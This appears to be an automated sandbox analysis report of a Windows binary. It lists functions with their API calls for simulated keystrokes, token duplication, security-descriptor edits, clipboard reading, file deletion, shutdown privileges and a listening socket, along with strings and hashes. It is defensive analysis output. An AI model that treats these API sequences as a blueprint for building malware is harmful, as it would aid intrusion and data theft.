Opcode Fuzzy Hash: 597b8765646a07c696c65a79752ef932a8152fb207bd73a88a2a641b11ee42ef
Instruction Fuzzy Hash: CF120171510209ABEB25AF34DC49FAE7BF8EF85310F10812DF51AEA2E1D7B49951CB50

Function 001FF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001FF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0023F474
IsIconic.USER32(00000000), ref: 0023F47D
ShowWindow.USER32(00000000,00000009), ref: 0023F48A
SetForegroundWindow.USER32(00000000), ref: 0023F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4AA
GetCurrentThreadId.KERNEL32 ref: 0023F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0023F4DE
SetForegroundWindow.USER32(00000000), ref: 0023F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F4F6
keybd_event.USER32(00000012,00000000), ref: 0023F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F50B
keybd_event.USER32(00000012,00000000), ref: 0023F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F519
keybd_event.USER32(00000012,00000000), ref: 0023F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F528
keybd_event.USER32(00000012,00000000), ref: 0023F52D
SetForegroundWindow.USER32(00000000), ref: 0023F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0023F557

Strings

Shell_TrayWnd, xrefs: 0023F46F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
Instruction ID: 15a26d74cb79bc74ec26e50af471c95b7cf9aed8e772cc69db92abfc7e015830
Opcode Fuzzy Hash: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
Instruction Fuzzy Hash: AD3153B1E502187BEB206FB56D4AFBF7E6CEB44B50F200069F604F61D1C6B15D50AA60

Function 00241201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00241286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002412A8
CloseHandle.KERNEL32(?), ref: 002412B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002412D1
GetProcessWindowStation.USER32 ref: 002412EA
SetProcessWindowStation.USER32(00000000), ref: 002412F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00241310

Part of subcall function 002410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
Part of subcall function 002410BF: CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9

Strings

Z*, xrefs: 00241392
, xrefs: 0024125A
default, xrefs: 0024130B
winsta0, xrefs: 002412CC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z*
API String ID: 22674027-678551114
Opcode ID: 5fb3d1f1da17708306b58fb274b025b70b9dc50117cb04c711d68ef82b1b24fe
Instruction ID: c26a8ed2b6318a4357a17df5c85cbbf253b6be2300f0afd663b78349fb41b41f
Opcode Fuzzy Hash: 5fb3d1f1da17708306b58fb274b025b70b9dc50117cb04c711d68ef82b1b24fe
Instruction Fuzzy Hash: 4E81AD7191020AAFDF299FA4DC49FEE7BB9EF04704F144129FA14B61A1D77099A4CF60

Function 00240B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240C00
GetLengthSid.ADVAPI32(?), ref: 00240C17
GetAce.ADVAPI32(?,00000000,?), ref: 00240C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240C6D
GetLengthSid.ADVAPI32(?), ref: 00240C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240C8C
HeapAlloc.KERNEL32(00000000), ref: 00240C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240CB4
CopySid.ADVAPI32(00000000), ref: 00240CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D45
HeapFree.KERNEL32(00000000), ref: 00240D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D55
HeapFree.KERNEL32(00000000), ref: 00240D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D65
HeapFree.KERNEL32(00000000), ref: 00240D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00240D78
HeapFree.KERNEL32(00000000), ref: 00240D7F

Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
Instruction ID: a18793054a63682b7a84ce92746c4de701ea01cd9d90990b371f1f3277709c97
Opcode Fuzzy Hash: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
Instruction Fuzzy Hash: ED71607191020AEBDF14DFE4DC88FAEBBB8FF04310F144529EA19A6151D771A995CBA0

Function 0025EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0027CC08), ref: 0025EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0025EB37
GetClipboardData.USER32(0000000D), ref: 0025EB43
CloseClipboard.USER32 ref: 0025EB4F
GlobalLock.KERNEL32(00000000), ref: 0025EB87
CloseClipboard.USER32 ref: 0025EB91
GlobalUnlock.KERNEL32(00000000), ref: 0025EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0025EBC9
GetClipboardData.USER32(00000001), ref: 0025EBD1
GlobalLock.KERNEL32(00000000), ref: 0025EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0025EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0025EC38
GetClipboardData.USER32(0000000F), ref: 0025EC44
GlobalLock.KERNEL32(00000000), ref: 0025EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0025EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0025ECF3
CountClipboardFormats.USER32 ref: 0025ED14
CloseClipboard.USER32 ref: 0025ED59

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
Instruction ID: e5362aedd431de337520045f7f0db9a0926884ece5307395f92e892be9b05c34
Opcode Fuzzy Hash: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
Instruction Fuzzy Hash: C06104702143029FD704EF31D888F2A77A8BF94705F25451DF85A872A2CB70DE49CB66

Function 0025698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002569BE
FindClose.KERNEL32(00000000), ref: 00256A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A75

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00256AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00256ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00256B6A
%03d, xrefs: 00256DA2
%4d, xrefs: 00256BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00256B32
%02d, xrefs: 00256C00, 00256C0A, 00256C5A, 00256CAA, 00256CFA, 00256D4A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
Instruction ID: caa794245eb28771b72fe07dd9c1e3226b72596a72e5b6b5e8df44779529a35f
Opcode Fuzzy Hash: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
Instruction Fuzzy Hash: B2D16F72508340AEC310EFA5D885EAFB7ECAFA8704F44491DF985D7191EB74DA48CB62

Function 00259642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00259663
GetFileAttributesW.KERNEL32(?), ref: 002596A1
SetFileAttributesW.KERNEL32(?,?), ref: 002596BB
FindNextFileW.KERNEL32(00000000,?), ref: 002596D3
FindClose.KERNEL32(00000000), ref: 002596DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002596FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0025974A
SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 00259768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00259772
FindClose.KERNEL32(00000000), ref: 0025977F
FindClose.KERNEL32(00000000), ref: 0025978F

Strings

*.*, xrefs: 002596F5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
Instruction ID: d46f7430f20c5f13acff53f0eea5439d42f62cd9f18bbf5d6c044eaf3edbd9d3
Opcode Fuzzy Hash: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
Instruction Fuzzy Hash: 2131C77152161AAFDB149FB4EC4CADE77AC9F0A321F24415AFC09E2091DB30D9D88E14

Function 0025979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002597BE
FindNextFileW.KERNEL32(00000000,?), ref: 00259819
FindClose.KERNEL32(00000000), ref: 00259824
FindFirstFileW.KERNEL32(*.*,?), ref: 00259840
SetCurrentDirectoryW.KERNEL32(?), ref: 00259890
SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 002598AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002598B8
FindClose.KERNEL32(00000000), ref: 002598C5
FindClose.KERNEL32(00000000), ref: 002598D5

Part of subcall function 0024DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0024DB00

Strings

*.*, xrefs: 0025983B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
Instruction ID: f8ab53f6390b65520c7b9ee33e1bc0e3f7a461bc71263bb23c4b9f66d54c61ee
Opcode Fuzzy Hash: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
Instruction Fuzzy Hash: E731B23151121AEEDB10AFB4EC4CADE77AC9F06321F24455AEC14A21D1DB30DAE8CF28

Function 00258195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00258257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00258267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00258273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00258310
SetCurrentDirectoryW.KERNEL32(?), ref: 00258324
SetCurrentDirectoryW.KERNEL32(?), ref: 00258356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0025838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00258395

Strings

*.*, xrefs: 0025839B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
Instruction ID: c570dcc60a98ab044af395c66e363a57e339360edc583f43932faa2daaf090ec
Opcode Fuzzy Hash: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
Instruction Fuzzy Hash: 10618872118745AFCB10EF60D8849AEB3E8BF89310F04885EF989D7251DB71E959CB92

Function 0024D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 0024E199: GetFileAttributesW.KERNEL32(?,0024CF95), ref: 0024E19A

FindFirstFileW.KERNEL32(?,?), ref: 0024D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0024D1DD
MoveFileW.KERNEL32(?,?), ref: 0024D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0024D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0024D237

Part of subcall function 0024D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0024D21C,?,?), ref: 0024D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0024D253
FindClose.KERNEL32(00000000), ref: 0024D264

Strings

\*.*, xrefs: 0024D0CD, 0024D0D6, 0024D0EB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
Instruction ID: f477a72e96ae9e7dbe8784ba5374955e7d3f8442dd4d5986d6cf2f7cb7b6a692
Opcode Fuzzy Hash: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
Instruction Fuzzy Hash: 61618C3180114DABCF19EFE1DA92DEDB7B5AF65300F604069E806771A2EB706F49CB60

Function 0025ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0025ED91
EmptyClipboard.USER32 ref: 0025ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0025EDAC
CloseClipboard.USER32 ref: 0025EEA3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
Instruction ID: 1061ba49aa0b06e928acafb1b2da9e5870b94e209b418c47c6dedecd68c2ae1e
Opcode Fuzzy Hash: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
Instruction Fuzzy Hash: 0741E1702146119FDB14DF25E88DB19BBE4FF44329F15C09DE8298B6A2C731ED81CB80

Function 0024E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A

ExitWindowsEx.USER32(?,00000000), ref: 0024E932

Strings

@, xrefs: 0024E925
SeShutdownPrivilege, xrefs: 0024E902
, xrefs: 0024E920
, xrefs: 0024E95C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
Instruction ID: dc002956119fd6cf14f1d75b1c5dba6d25d57bf9f258fcdcef61315413865461
Opcode Fuzzy Hash: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
Instruction Fuzzy Hash: 5001DB73630211ABFF5C26B4AC8ABBF725CB714750F160425FC02E21D2D6A15CA08694

Function 00261204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00261276
WSAGetLastError.WSOCK32 ref: 00261283
bind.WSOCK32(00000000,?,00000010), ref: 002612BA
WSAGetLastError.WSOCK32 ref: 002612C5
closesocket.WSOCK32(00000000), ref: 002612F4
listen.WSOCK32(00000000,00000005), ref: 00261303
WSAGetLastError.WSOCK32 ref: 0026130D
closesocket.WSOCK32(00000000), ref: 0026133C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
Instruction ID: 2cb9563e7fd7018e95377fbcff94e887f3b0a1eda8fc39c32be1d9e5f7b5e1f8
Opcode Fuzzy Hash: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
Instruction Fuzzy Hash: CB417D31A001519FD710DF24D498B2ABBE5AF46318F2C818CE8568F296C771ECD1CBE1

Function 0021B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0021B9D4
_free.LIBCMT ref: 0021B9F8
_free.LIBCMT ref: 0021BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
_free.LIBCMT ref: 0021BD4B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

